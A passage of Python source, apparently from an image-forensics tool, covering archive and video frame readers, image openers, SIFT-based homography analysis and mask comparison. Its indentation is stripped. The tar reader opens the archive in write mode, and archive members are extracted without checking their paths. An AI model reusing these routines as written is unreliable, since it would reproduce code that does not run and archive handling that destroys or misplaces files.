def loadMeta(self):
self.meta = {}
if 'meta.csv' in self.myzip.namelist():
fn = self._extract_name('meta.csv')
with open(fn,mode='r') as fp:
for line in fp.readlines():
parts = line.split(',')
self.meta[parts[0].lower().strip()] = ','.join(parts[1:])
self.fps = self.fps if 'frame_rate' not in self.meta else float(self.meta['frame_rate'])
def get_size(self):
return len(self.names)
def isOpened(self):
#TODO: check names, what else
return True
def _extract_name(self,name):
extracted_file = os.path.join(self.dir, name)
if not os.path.exists(extracted_file):
extracted_file = self.myzip.extract(name, self.dir)
return extracted_file
def get(self,prop):
if prop == cv2api.cv2api_delegate.prop_fps:
return self.fps
if prop == cv2api.cv2api_delegate.prop_frame_count:
return self.get_size()
if prop == cv2api.cv2api_delegate.prop_pos_msec:
return self.count* 1000.0/self.fps
exif = self.get_exif()
if prop == cv2api.cv2api_delegate.prop_frame_height:
return getExifDimensionsFromData(exif)[0][0]
if prop == cv2api.cv2api_delegate.prop_frame_width:
return getExifDimensionsFromData(exif)[0][1]
def grab(self):
self.count+=1
return self.count <= len(self.names)
def get_exif(self):
if self.exif is None:
name = self.names[min(len(self.names)-1,max(0, self.count - 1))]
extracted_file = self._extract_name (name)
self.exif = exif.getexif(extracted_file)
return self.exif
def retrieve(self):
if self.count > len(self.names):
return False, None
name = self.names[self.count-1]
extracted_file = self._extract_name (name)
return True, openImage(extracted_file, isMask=False).to_array()
def set_to_end(self):
self.count = len(self.names)
def retrieve_file(self):
if self.count > len(self.names):
return None
name = self.names[self.count-1]
extracted_file = self._extract_name (name)
return extracted_file
def read(self):
self.grab()
return self.retrieve()
def release(self):
import shutil
if self.dir is not None:
shutil.rmtree(self.dir)
self.myzip.close()
self.dir = None
def readFromZip(filename, filetypes=imagefiletypes, videoFrameTime=None, isMask=False, snapshotFileName=None, fps=30):
from zipfile import ZipFile
import re
file_type_matcher = re.compile('.*\.(' + '|'.join([ft[1][ft[1].rfind('.') + 1:] for ft in filetypes]) + ')')
with ZipFile(filename, 'r') as myzip:
names = myzip.namelist()
names.sort()
time_manager = VidTimeManager(stopTimeandFrame=videoFrameTime)
i = 0
for name in names:
i += 1
elapsed_time = i * fps
if len(file_type_matcher.findall(name.lower())) == 0:
continue
time_manager.updateToNow(elapsed_time)
if time_manager.isPastTime() or videoFrameTime is None:
break
extracted_file = myzip.extract(name, os.path.dirname(os.path.abspath(filename)))
img = openImage(extracted_file, isMask=isMask)
if extracted_file != snapshotFileName and snapshotFileName is not None:
img.save(snapshotFileName)
return img
def readFromArchive(filename, filetypes=imagefiletypes, videoFrameTime=None, isMask=False, snapshotFileName=None, fps=30):
import tarfile
import re
file_type_matcher = re.compile('.*\.(' + '|'.join([ft[1][ft[1].rfind('.') + 1:] for ft in filetypes]) + ')')
archive = tarfile.open(filename, "w:gz")
try:
names = archive.getnames()
names.sort()
time_manager = VidTimeManager(stopTimeandFrame=videoFrameTime)
i = 0
for name in names:
i += 1
elapsed_time = i * fps
if len(file_type_matcher.findall(name.lower())) == 0:
continue
time_manager.updateToNow(elapsed_time)
if time_manager.isPastTime() or videoFrameTime is None:
break
if names:
extracted_file = archive.extract(name, os.path.dirname(os.path.abspath(filename)))
img = openImage(extracted_file, isMask=isMask)
else:
extracted_file =''
img = openImage('')
if extracted_file != snapshotFileName and snapshotFileName is not None:
img.save(snapshotFileName)
return img
finally:
archive.close()
def readImageFromVideo(filename, videoFrameTime=None, isMask=False, snapshotFileName=None):
cap = cv2api.cv2api_delegate.videoCapture(filename, useFFMPEGForTime=False)
bestSoFar = None
bestVariance = -1
maxTry = 20
time_manager = VidTimeManager(stopTimeandFrame=videoFrameTime)
try:
while cap.isOpened():
ret, frame = cap.read()
if not ret:
break
frame = frame[..., ::-1]
elapsed_time = cap.get(cv2api.cv2api_delegate.prop_pos_msec)
time_manager.updateToNow(elapsed_time)
if time_manager.isPastTime():
bestSoFar = frame
break
varianceOfImage = math.sqrt(ndimage.measurements.variance(frame))
if frame is not None and bestVariance < varianceOfImage:
bestSoFar = frame
bestVariance = varianceOfImage
maxTry -= 1
if not videoFrameTime and maxTry <= 0:
break
finally:
cap.release()
if bestSoFar is None:
logging.getLogger('maskgen').error(
"{} cannot be read by OpenCV/ffmpeg. Mask generation will not function properly.".format(filename))
return outputVideoFrame(filename, outputName=snapshotFileName, videoFrameTime=videoFrameTime, isMask=isMask)
else:
img = ImageWrapper(bestSoFar, to_mask=isMask)
if snapshotFileName is not None and snapshotFileName != filename:
img.save(snapshotFileName)
return img
def md5_of_file(filename, raiseError=True, load_size=500000000):
import hashlib
import os
try:
size = os.stat(filename).st_size
with open(filename, 'rb') as rp:
if size < load_size:
return hashlib.md5(rp.read()).hexdigest()
else:
m = hashlib.md5()
while True:
b = rp.read(load_size)
if b is not None and len(b) > 0:
m.update(b)
else:
break
return m.hexdigest()
except Exception as e:
if raiseError:
raise e
return ''
def uniqueId():
import time
return str(time.time()).replace('.', '')
def shortenName(name, postfix, identifier=None):
import hashlib
middle = ''.join([(x[0] + x[-1] if len(x) > 1 else x) for x in name.split('_')])
if identifier is not None:
middle = middle + '_' + str(identifier)
return hashlib.md5(name + postfix).hexdigest() + '_' + middle + '_' + postfix
class ImageOpener:
def __init__(self):
pass
def openImage(self, filename, isMask=False, args=None):
try:
img = openImageFile(filename, isMask=isMask, args=args)
return img if img is not None else openImage(get_icon('RedX.png'))
except Exception as e:
logging.getLogger('maskgen').warning('Failed to load ' + filename + ': ' + str(e))
return openImage(get_icon('RedX.png'))
class AudioOpener(ImageOpener):
def __init__(self):
ImageOpener.__init__(self)
def openImage(self, filename, isMask=False, args=None):
return ImageOpener.openImage(self, get_icon('audio.png'))
class VideoOpener(ImageOpener):
def __init__(self, videoFrameTime=None, preserveSnapshot=True):
self.videoFrameTime = videoFrameTime
self.preserveSnapshot = preserveSnapshot
ImageOpener.__init__(self)
def openSnapshot(self, filename, snapshotFileName):
return os.path.exists(snapshotFileName) and \
os.stat(snapshotFileName).st_mtime >= os.stat(filename).st_mtime
def openImage(self, filename, isMask=False, args=None):
if not ('video' in getFileMeta(filename)):
return ImageOpener.openImage(self, get_icon('audio.png'))
snapshotFileName = os.path.splitext(filename)[0] + '.png'
if self.openSnapshot(filename, snapshotFileName):
return ImageOpener.openImage(self, snapshotFileName)
videoFrameImg = readImageFromVideo(filename, videoFrameTime=self.videoFrameTime, isMask=isMask,
snapshotFileName=snapshotFileName if self.preserveSnapshot else None)
if videoFrameImg is None:
logging.getLogger('maskgen').warning('invalid or corrupted file ' + filename)
return ImageOpener.openImage(self, get_icon('RedX.png'))
return videoFrameImg
class ZipOpener(VideoOpener):
def __init__(self, videoFrameTime=None, preserveSnapshot=True):
VideoOpener.__init__(self, videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
def openImage(self, filename, isMask=False, args=None):
snapshotFileName = os.path.splitext(filename)[0] + '.png'
if self.openSnapshot(filename, snapshotFileName):
return ImageOpener.openImage(self, snapshotFileName)
videoFrameImg = readFromZip(filename, videoFrameTime=self.videoFrameTime, isMask=isMask,
snapshotFileName=snapshotFileName if self.preserveSnapshot else None)
if videoFrameImg is None:
logging.getLogger('maskgen').warning('invalid or corrupted file ' + filename)
return ImageOpener.openImage(self, get_icon('RedX.png'))
return videoFrameImg
class CollectionOpener(ImageOpener):
def __init__(self):
ImageOpener.__init__(self)
def openImage(self, filename, isMask=False, args=None):
return ImageOpener.openImage(self, get_icon('zip.jpg'))
class TgzOpener(VideoOpener):
def __init__(self, videoFrameTime=None, preserveSnapshot=True):
VideoOpener.__init__(self, videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
def openImage(self, filename, isMask=False, args=None):
snapshotFileName = os.path.splitext(filename)[0] + '.png'
if self.openSnapshot(filename, snapshotFileName):
return ImageOpener.openImage(self, snapshotFileName)
videoFrameImg = readFromArchive(filename, videoFrameTime=self.videoFrameTime, isMask=isMask,
snapshotFileName=snapshotFileName if self.preserveSnapshot else None)
if videoFrameImg is None:
logging.getLogger('maskgen').warning('invalid or corrupted file ' + filename)
return ImageOpener.openImage(self, get_icon('RedX.png'))
return videoFrameImg
def getContentsOfZip(filename):
from zipfile import ZipFile
with ZipFile(filename, 'r') as inzip:
names = inzip.namelist()
names.sort()
return names
def condenseZip(filename, outputfile=None, filetypes=None, keep=2):
from zipfile import ZipFile
import re
filetypematcher = re.compile('.*\.(' + '|'.join([ft[1][ft[1].rfind('.') + 1:] for ft in filetypes]) + ')') \
if filetypes is not None else re.compile('.*')
fn = os.path.splitext(filename)[0] + '_c' + os.path.splitext(filename)[1] if outputfile is None else outputfile
cleanup = []
try:
with ZipFile(fn, 'w') as outzip:
with ZipFile(filename, 'r') as inzip:
names = inzip.namelist()
names.sort()
extensions = {}
for i in range(len(names)):
name = names[i]
extension = os.path.splitext(name)[1]
if len(filetypematcher.findall(name)) == 0:
continue
if extension not in extensions:
extensions[extension] = 1
else:
extensions[extension] += 1
dir = os.path.dirname(os.path.abspath(filename))
extracted_file = os.path.join(dir, name)
cleanup.append(extracted_file)
if extensions[extension] <= keep:
extracted_file = inzip.extract(name, dir)
outzip.write(extracted_file, name)
else:
with open(extracted_file, 'wb') as fp:
fp.flush()
outzip.write(extracted_file, name)
finally:
for filename in cleanup:
if os.path.exists(filename):
os.remove(filename)
def openImage(filename, videoFrameTime=None, isMask=False, preserveSnapshot=False, args=None):
"""
Open and return an image from the file. If the file is a video, find the first non-uniform frame.
videoFrameTime, integer time in milliseconds, is provided, then find the frame after that point in time
preserveSnapshot, False by default, informs the function to save the frame image after extraction for videos
"""
import os
if not os.path.exists(filename):
logging.getLogger('maskgen').warning(filename + ' is missing.')
if not filename.endswith('icons/RedX.png'):
return openImage(get_icon('RedX.png'))
return None
prefix = os.path.splitext(filename)[1][1:].lower()
opener = ImageOpener()
if prefix in ['avi', 'mp4', 'mov', 'flv', 'qt', 'wmv', 'm4p', 'mpeg', 'mpv',
'm4v', 'mts', 'mpg'] or fileType(filename) == 'video':
opener = VideoOpener(videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
elif prefix in ['zip', 'gz']:
if fileType(filename) == 'collection':
opener = CollectionOpener()
else:
opener = ZipOpener(videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
elif prefix in [ 'tgz']:
if fileType(filename) == 'collection':
opener = CollectionOpener()
else:
opener = TgzOpener(videoFrameTime=videoFrameTime, preserveSnapshot=preserveSnapshot)
elif fileType(filename) == 'audio':
opener = AudioOpener()
return opener.openImage(filename, isMask=isMask, args=args)
def interpolateMask(mask, startIm, destIm, invert=False, arguments=dict()):
"""
:param mask:
:param img1:
:param img2:
:param invert:
:param arguments:
:return:
@type mask: ImageWrapper
@type img2: ImageWrapper
@type img1: ImageWrapper
"""
maskInverted = mask if invert else mask.invert()
mask = np.asarray(mask)
mask = mask.astype('uint8')
logger = logging.getLogger('maskgen')
try:
mask1 = convertToMask(startIm).to_array() if startIm.has_alpha() else None
logger.debug('SIFT')
TM, matchCount = __sift(startIm, destIm, mask1=mask1, mask2=maskInverted, arguments=arguments)
except:
TM = None
if TM is not None:
logger.debug('WARP')
newMask = cv2.warpPerspective(mask, TM, (startIm.size[0], startIm.size[1]), flags=cv2.WARP_INVERSE_MAP,
borderMode=cv2.BORDER_CONSTANT, borderValue=255)
analysis = {}
analysis['transform matrix'] = serializeMatrix(TM)
return newMask, analysis
elif getValue(arguments,'homography','None') != 'None':
logger.debug('SIFT Failed. Find Countours')
try:
contours, hier = cv2api.findContours(255 - mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
minpoint = None
maxpoint = None
for contour in contours:
for point in contour:
if type(point[0]) is np.ndarray:
point = point[0]
if minpoint is None:
minpoint = point
else:
minpoint = (min(minpoint[0], point[0]), min(minpoint[1], point[1]))
if maxpoint is None:
maxpoint = point
else:
maxpoint = (max(maxpoint[0], point[0]), max(maxpoint[1], point[1]))
w = maxpoint[0] - minpoint[0] + 1
h = maxpoint[1] - minpoint[1] + 1
x = minpoint[0]
y = minpoint[1]
if (startIm.size[0] - w) == 0 and (startIm.size[1] - h) == 0:
return mask[y:y + h, x:x + w], {}
except:
return None, None
return None, None
def serializeMatrix(m):
if m is None:
return None
data = {'r': m.shape[0],'c':m.shape[1]}
for r in range(m.shape[0]):
data['r' + str(r)] = list(m[r, :])
return data
def deserializeMatrix(data):
if data is None:
return None
m = np.zeros((int(data['r']), int(data['c'])))
for r in range(m.shape[0]):
m[r, :] = data['r' + str(r)]
return m
def redistribute_intensity(edge_map):
"""
Produce a intensity_map that redistributes the intensity values found in the edge_map evenly over 1 to 255
:param edge_map contains a map between an edge identifier (s,e) and an intensity value from 1 to 255 and possibly a color
:return map of intensity value from edge map to a replacement intensity value
@type edge_map {(str,str): (int,[])}
"""
levels = [x[0] for x in edge_map.values()]
colors = [str(x[1]) for x in edge_map.values() if x[1] is not None]
unique_colors = sorted(np.unique(colors))
intensities = sorted(np.unique(levels))
intensity_map = [0]
if len(unique_colors) == len(intensities):
for x in edge_map.values():
intensity_map[x[0]] = x[1]
return intensity_map
increment = int(16777216 / (len(intensities) + 1))
for pos in range(len(intensities)):
v = (pos + 1) * increment
intensity_map.append([(v % 65536) / 256, v / 65536, (v % 65536) % 256])
for k, v in edge_map.iteritems():
edge_map[k] = (v[0], intensity_map[v[0]])
#im = np.zeros((500,500,3)).astype('uint8')
#pos = 0
#for i in intensity_map:
# im[pos,:] = i
# pos+=1
#ImageWrapper(im).save('foo.png')
return intensity_map
def maskToColorArray(img, color=[0, 0, 0]):
"""
Create a new image setting all white to the color and all black to white.
:param img:
:param color:
:return:
@type img: ImageWrapper
@rtype ImageWrapper
"""
imarray = np.asarray(img)
rgb = np.ones((imarray.shape[0], imarray.shape[1], 3)).astype('uint8') * 255
rgb[imarray == 0, :] = color
return rgb
def toColor(img, intensity_map={}):
"""
Produce an image that changes gray scale to color.
First, set the intensity values of each pixel using the intensity value from the intensity map
Then use a color map to build a color image
Then repopulate the edge_map with the assigned color for each edge
:param img gray scale image
:param intensity_map intensity value mapped to its replacement
:return the new color image
"""
result = cv2.applyColorMap(img.astype('uint8'), cv2.COLORMAP_HSV)
for old, new in intensity_map.iteritems():
result[img == old] = new
result[img == 0] = [255, 255, 255]
return result
def toComposite(img):
"""
Convert to a mask with white indicating change
:param img gray scale image
:return image
"""
result = np.zeros(img.shape).astype('uint8')
result[img > 0] = 255
return result
def toIntTuple(tupleString):
import re
if tupleString is not None and tupleString.find(',') > 0:
return tuple([int(re.sub('[()L]', '', x)) for x in tupleString.split(',')])
return 0, 0
def sizeOfChange(mask):
if len(mask.shape) == 2:
return mask.size - sumMask(mask == 255)
else:
mask_size = mask.shape[0] * mask.shape[1]
return mask_size - sumMask(np.all(mask == [255, 255, 255], axis=2))
def maskChangeAnalysis(mask, globalAnalysis=False):
mask = np.asarray(mask)
totalPossible = reduce(lambda a, x: a * x, mask.shape)
totalChange = sumMask(mask.astype('float32')) / 255.0
ratio = float(totalChange) / float(totalPossible)
globalchange = True
if globalAnalysis:
globalchange = ratio > 0.75
(x, y), (w, h) = boundingRegion(mask)
area = float(w*h)
region = mask[x:x+w,y:y+w]
np.diff(np.where(region > 0)[1])
xhist = np.histogram(np.where(region > 0)[0],bins=min(256,region.shape[0]))[0]
yhist = np.histogram(np.where(region > 0)[0],bins=min(256,region.shape[1]))[0]
dispersion = xhist[0] > 0 and xhist[-1] > 0 and yhist[0] > 0 and yhist[-1] > 0
globalchange |= (area/totalPossible > 0.75) and dispersion
return globalchange, 'small' if totalChange < 2500 else ('medium' if totalChange < 10000 else 'large'), ratio
def SSIMAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments={}, directory='.'):
globalchange = img1.size != img2.size
img1, img2 = __alignChannels(img1, img2)
analysis['ssim'] = compare_ssim(np.asarray(img1), np.asarray(img2), multichannel=False),
if mask is not None:
mask = np.copy(np.asarray(mask))
mask[mask > 0] = 1
analysis['local ssim'] = ssim(img1 * mask, img2 * mask, mask, R=65536)
return globalchange
def globalTransformAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments={}, directory='.'):
"""
Determine if operation is global. Capture 'change size ratio' and 'change size category'.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
globalchange = img1.size != img2.size
totalChange = ''
ratio = 1.0
if mask is not None:
globalchange, totalChange, ratio = maskChangeAnalysis(mask, not globalchange)
analysis['global'] = arguments['global operation'] if 'global operation' in arguments else \
('yes' if globalchange else 'no')
analysis['change size ratio'] = ratio
analysis['change size category'] = totalChange
return globalchange
def localTransformAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments={}, directory='.'):
"""
Non-global operations, capturing 'change size ratio' and 'change size category'.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
globalchange = globalTransformAnalysis(analysis, img1, img2,
mask=mask,
linktype=linktype,
arguments=arguments,
directory=directory)
analysis['global'] = 'no'
return globalchange
def forcedSiftWithInputAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
Perform SIFT regardless of the global change status, using an input mask from the parameters
to select the source region.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments: parameters
:return:
"""
globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments)
if linktype != 'image.image':
return
if 'inputmaskname' in arguments:
inputmask = openImageFile(os.path.join(directory, arguments['inputmaskname'])).to_mask().to_array()
# a bit arbitrary. If there is a less than 50% overlap, then isolate the regions highlighted by the inputmask
# otherwise just use the change mask for the transform. The change mask should be the full set of the pixels
# changed and the input mask a subset of those pixels
if sumMask(abs((mask.image_array - inputmask) / 255)) / float(sumMask(mask.image_array / 255)) >= 0.75:
# want mask2 to be the region moved to
mask2 = mask - inputmask
# mask1 to be the region moved from
mask = inputmask
else:
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
else:
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
matrix, matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=arguments)
analysis['transform matrix'] = serializeMatrix(matrix)
def forcedSiftAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
Perform SIFT regardless of the global change status.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:return:
"""
globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments)
if linktype != 'image.image':
return
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
matrix, matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=arguments)
analysis['transform matrix'] = serializeMatrix(matrix)
def seamAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
Perform SIFT regardless of the global change status. If neighbor mask is is constructed, indicating the seams
can be calculated, then mark as not Global.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
forcedSiftAnalysis(analysis, img1, img2, mask=mask, linktype=linktype, arguments=arguments, directory=directory)
if 'neighbor mask' in arguments:
analysis['global'] = 'no'
def rotateSiftAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
If the image is rotated by values other than factors of 90 degrees, use SIFT to build a homography.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
import copy
rot = float(getValue(arguments,'rotation',-1))
is_local = getValue(arguments,'local',True)
globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments)
if abs(rot % 90)<0.001 and not is_local:
return
if is_local:
return siftAnalysis(analysis, img1, img2, mask=mask, linktype=linktype, arguments=arguments, directory=directory)
# global case and not a factor of 90
# skip video
if linktype != 'image.image':
return
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
serializedMatrix = getValue(arguments,'transform matrix')
if serializedMatrix is None:
args = copy.copy(arguments)
(x,y),(w,h) = boundingRegion(mask.invert().image_array)
if (w-x + h-y) > 0.5*(mask.size[0] + mask.size[1]):
args['Matcher.TREES'] = 6
args['Matcher.CHECKS'] = 20
matrix,matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=args)
if matrix is not None and isHomographyOk(matrix,img1.size[1],img1.size[0]):
analysis['transform matrix'] = serializeMatrix(matrix)
else:
analysis['transform matrix'] = serializedMatrix
def siftAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
Use SIFT to build a homography for transform type changes that manipulated prior masks for probes.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
if globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments):
return
if linktype != 'image.image':
return
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
matrix, matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=arguments)
analysis['transform matrix'] = serializeMatrix(matrix)
def boundingRegion(mask):
x, y, w, h = widthandheight(mask)
return (x, y), (x + w, y + h)
def boundingRectange(mask):
allpoints = []
contours, hierarchy = cv2api.findContours(np.copy(mask), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
for i in range(0, len(contours)):
cnt = contours[i]
allpoints.extend(cnt)
hull = cv2.convexHull(np.asarray(allpoints))
return cv2.minAreaRect(hull)
def _affineTransformDonorImage(initialImage, donorImage, mask, donorMask):
dims = initialImage.shape[2]
IM = (255 - mask)
IDM = (255 - donorMask)
mcenter, mdims, mrotation = boundingRectange(IM)
dcenter, ddims, drotation = boundingRectange(IDM)
ratiox = float(donorImage.shape[0]) / float(initialImage.shape[0])
ratioy = float(donorImage.shape[1]) / float(initialImage.shape[1])
scale = min(float(mdims[0]) * ratiox / ddims[0], float(mdims[1]) * ratioy / ddims[1])
M = cv2.getRotationMatrix2D(mcenter, drotation - mrotation, scale)
IDM3 = np.zeros((donorImage.shape[0], donorImage.shape[1], dims))
IM3 = np.zeros((initialImage.shape[0], initialImage.shape[1], dims))
for i in range(dims):
IDM3[:, :, i] = IDM
IM3[:, :, i] = IM
donorImageSelection = donorImage[:, :, 0:dims] * IDM3
return cv2.warpAffine(donorImageSelection, M, (initialImage.shape[1], initialImage.shape[0]))
def generateOpacityImage(initialImage, donorImage, outputImg, mask, donorMask, tm):
"""
Assume opacity is o such that
outputImg = initialImage*(mask/255) + initialImage*((255-mask)/255)*(1-o) + donorImage*o*((255-donormask)/255)
IM = inverted mask
IDM = inverted donor mask
outputImg - initialImage*(mask/255) = initialImage*IM - initialImage*IM*o + donorImage*o*((255-donormask)/255)
outputImg - initialImage*(mask/255) - initialImage*IM = donorImage*IDM*o - initialImage*IM*o
outputImg - initialImage = donorImage*IDM*o - initialImage*IM*o
outputImg - initialImage = o * (donorImage*IDM - initialImage*IM)
o = (outputImg - initialImage)/(donorImage*IDM - initialImage*IM)
Challenging since the donor mask is not lined up the image exactly.
:param img1:
:param img2:
:param outputImg:
:param mask:
:return:
"""
dims = initialImage.shape[2]
IDM = (255 - donorMask) / 255
IM = (255 - mask) / 255
IDM3 = np.zeros((donorImage.shape[0], donorImage.shape[1], dims))
IM3 = np.zeros((initialImage.shape[0], initialImage.shape[1], dims))
for i in range(dims):
IDM3[:, :, i] = IDM
IM3[:, :, i] = IM
donorImageSelection = (donorImage[:, :, 0:dims] * IDM3)
if tm is not None:
transformedImageAligned = cv2.warpPerspective(donorImageSelection, tm,
(initialImage.shape[1], initialImage.shape[0]),
flags=cv2.INTER_LINEAR,
borderMode=cv2.BORDER_CONSTANT, borderValue=0)
else:
transformedImageAligned = _affineTransformDonorImage(initialImage, donorImage, mask, donorMask).astype('uint8')
# r = i(1-o) + t*o
# r = i - o*i + t*o
# r-i = o*t - o*i
# r-i= o(t-i)
# o = (r-i)/(t-i)
diffDonorImage = abs(transformedImageAligned * IM3 - initialImage * IM3).astype('float32')
diffOutputImage = abs(outputImg[:, :, 0:dims] * IM3 - initialImage * IM3).astype('float32')
result = np.zeros(diffOutputImage.shape)
result[diffDonorImage > 0.0] = diffOutputImage[diffDonorImage > 0] / diffDonorImage[diffDonorImage > 0.0]
result[np.isinf(result)] = 0.0
result[result > 1] = 1.0
if dims > 3:
result[:, :, 3] = 1
return result
def generateOpacityColorMask(initialImage, donorImage, outputImg, mask, donorMask):
result = generateOpacityImage(initialImage, donorImage, outputImg, mask, donorMask)
min = np.min(result)
max = np.max(result)
return (result - min) / (max - min) * 255.0
def optionalSiftAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
If 'location change' is not in parameters or 'location change' is no, skip tis step.
Otherwise, use SIFT to find a homography.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
if 'location change' not in arguments or arguments['location change'] == 'no':
return
globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments)
if linktype != 'image.image':
return
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
matrix, matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=arguments)
if matrix is not None:
analysis['transform matrix'] = serializeMatrix(matrix)
def createMask(img1, img2, invert=False, arguments={}, alternativeFunction=None, convertFunction=None):
mask, analysis, error = __composeMask(img1,
img2,
invert,
arguments=arguments,
alternativeFunction=alternativeFunction,
convertFunction=convertFunction)
analysis['shape change'] = sizeDiff(img1, img2)
if 'location' not in analysis:
analysis['location'] = '(0,0)'
analysis['empty mask'] = 'yes' if np.all(mask == 255) else 'no'
return ImageWrapper(mask), analysis, error
def __indexOf(source, dest):
positions = []
for spos in range(len(source)):
for dpos in range(len(dest)):
if (source[spos] == dest[dpos]).all():
positions.append(spos)
break
return positions
def __flannMatcher(d1, d2, args=None):
FLANN_INDEX_KDTREE = 0
TREES = 16
CHECKS = 50
if 'Matcher.CHECKS' in args:
CHECKS = int(args['Matcher.CHECKS'])
if 'Matcher.TREES' in args:
TREES = int(args['Matcher.TREES'])
index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=TREES)
search_params = dict(checks=CHECKS)
flann = cv2.FlannBasedMatcher(index_params, search_params)
return flann.knnMatch(d1, d2, k=2) if d1 is not None and d2 is not None else []
def getMatchedSIFeatures(img1, img2, mask1=None, mask2=None, arguments=dict(), matcher=__flannMatcher):
img1 = img1.to_rgb(data_type=np.uint8).apply_mask(mask1).to_array()
img2 = img2.to_rgb(data_type=np.uint8).apply_mask(mask2).to_array()
threshold = arguments['sift_match_threshold'] if 'sift_match_threshold' in arguments else 10
maxmatches = int(arguments['homography max matches']) if 'homography max matches' in arguments else 10000
def getRange(size, segment_size=2048):
"""
Divided up the size into segment_size ranges
:param size:
:param segment_size:
:return: list of ranges as representd by tuples(start,end, last range indicator)
"""
ranges = [(x * segment_size, min((x + 1) * segment_size, size), False) for x in range(size / segment_size + 1)]
if ranges[-1][1] - ranges[-1][0] < segment_size and len(ranges) > 1:
ranges = ranges[:-2] + [(ranges[-2][0],ranges[-1][1], True)]
else:
ranges[-1] = (ranges[-1][0], ranges[-1][1], True)
return ranges
def updateKP(kp,pos):
kp.pt = (kp.pt[0]+pos[0], kp.pt[1]+pos[1])
return kp
def filterKP(pt, xstart, xend, ystart, yend):
"""
Filter out points outside the 'window' surrounded by the buffer
:param pt:
:param xstart:
:param xend:
:param ystart:
:param yend:
:return:
"""
return \
(pt[0] >= xstart and pt[0] <= xend) and \
(pt[1] >= ystart and pt[1] <= yend)
def computeSIFTOverRanges(img1,buffer_size=16, segment_size=2048):
total_kp = []
total_d = None
for xrange in getRange(img1.shape[0]):
for yrange in getRange(img1.shape[1]):
(kp, ds) = cv2api.cv2api_delegate.computeSIFT(
img1[max(0,xrange[0]-buffer_size):min(xrange[1]+buffer_size,img1.shape[0]),
max(0,yrange[0]-buffer_size):min(yrange[1]+buffer_size,img1.shape[1])])
xstart = buffer_size - 1 if xrange[0] > 0 else 0
xend = segment_size*2 if xrange[2] else (segment_size + \
(0 if xrange[0] == 0 else buffer_size))
ystart = buffer_size - 1 if yrange[0] > 0 else 0
yend = segment_size*2 if yrange[2] else (segment_size + \
(0 if yrange[0] == 0 else buffer_size))
kept = [kpi for kpi in range(len(kp)) if filterKP(kp[kpi].pt,
xstart,xend,
ystart,yend)]
total_kp.extend([updateKP(kp[kpi],(xrange[0],yrange[0])) for kpi in kept])
if ds is not None:
ds = ds[kept,:]
if total_d is None:
total_d = ds
else:
total_d = np.concatenate((total_d,ds))
return total_kp,total_d
(kp2, d2) = computeSIFTOverRanges(img2)
if kp2 is None or len(kp2) == 0:
return None
(kp1, d1) = computeSIFTOverRanges(img1)
if kp1 is None or len(kp1) == 0:
return None
d1 /= (d1.sum(axis=1, keepdims=True) + 1e-7)
d1 = np.sqrt(d1)
d2 /= (d2.sum(axis=1, keepdims=True) + 1e-7)
d2 = np.sqrt(d2)
matches = matcher(d1,d2, args=arguments)
# store all the good matches as per Lowe's ratio test.
good = [m for m, n in matches if m.distance < 0.75 * n.distance]
good = sorted(good, lambda g1, g2: -int(max(g1.distance, g2.distance) * 1000))
good = good[0:min(maxmatches, len(good))]
if len(good) >= threshold:
src_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)
dst_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)
return (src_pts, dst_pts) if src_pts is not None else None
return None
def _remap(img, mask, src_pts, dst_pts):
from scipy.interpolate import griddata
long = mask.reshape(mask.shape[0] * mask.shape[1])
grid_x, grid_y = np.mgrid[0:mask.shape[0], 0:mask.shape[1]]
